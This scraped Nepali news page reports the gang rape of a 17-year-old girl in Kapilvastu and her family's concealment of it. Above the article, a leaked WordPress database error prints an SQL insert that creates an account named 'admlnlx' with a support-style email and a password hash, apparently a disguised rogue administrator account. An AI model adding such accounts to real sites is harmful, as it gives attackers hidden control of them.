WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsC1Bl43wL/yUAap7Y.pBdknh7gj3N1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 08:08:40', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
प्रेमी भेट्न हिडेकी युवतीलाई सिसौघारीमा गरे सामूहिक बलात्कार – Gaule Khabar

प्रेमी भेट्न हिडेकी युवतीलाई सिसौघारीमा गरे सामूहिक बलात्कार

प्रेमी भेट्न हिडेकी युवतीलाई सिसौघारीमा गरे सामूहिक बलात्कार

कपिलवस्तु, फागुन ३ –

पाँच जना युवकले एक युवतीलाई सामुहिक बलात्कार गरेको खुलेको छ ।गत माघ २६ गते तौलिहवा लुम्बिनी सडक अन्तर्गत पकडी गाविसको पकडी बजार नजिक सिसौघारीमा १७ बर्षीया भारतीय युवती बलात्कारको सिकार भएकी हुन् ।

फागुन ३ गते विवाहका लागि ती युवतीको तिलक तय थियो । त्यसैले परिवारले बलात्कारजस्तो जघन्य अपराध लुकाएको पाइएको छ । घटना सार्वजनिक भएमा विवाह प्रभावित हुने डरले लुकाएको पारिवारिक स्रोतले जनाएको  छ ।

तर, बलात्कारमा संलग्न युवाहरुले नै इन्टरनेटमार्फत घटना सार्वजनिक गरेपछि बाहिर आएको हो । फुपूको घर बिमिहाबाट फर्कीरहेकी युवती २६ गते दिउँसो सामुहिक बलात्कारमा परेकी हुन् ।

युवतीको गाउँकै एक युवासँग प्रेम रहेको स्थानियको भनाइ छ । युवाले नै भेट्नको लागि त्यहाँ पुर्याएको उनीहरुले बताए । त्रासका कारण घटनाबारे यूवतीले कसैलाई भनेकी थिइनन् ।  कान्तिपुर दैनिकमा खबर छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका